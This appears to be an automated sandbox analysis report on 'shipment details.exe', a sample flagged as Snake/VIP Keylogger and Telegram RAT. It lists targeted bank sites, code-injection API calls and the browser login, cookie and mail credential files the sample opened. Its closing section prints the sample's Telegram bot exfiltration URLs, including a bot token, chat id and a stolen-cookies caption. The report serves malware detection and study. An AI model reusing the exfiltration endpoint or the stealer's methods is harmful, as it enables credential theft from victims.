Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce87960e4dfa2<
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4518709296.0000000001126000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\shipment details.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\shipment details.exe Code function: 1_2_06BD9548 LdrInitializeThunk, 1_2_06BD9548
Enables debug privileges
Source: C:\Users\user\Desktop\shipment details.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\shipment details.exe Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\shipment details.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.shipment details.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
56.163.245.4.in-addr.arpa unknown unknown
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135869667&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
    		unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2009/10/2024%20/%2004:32:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown
      https://reallyfreegeoip.org/xml/8.46.123.33 false
      • URL Reputation: safe
      		 unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown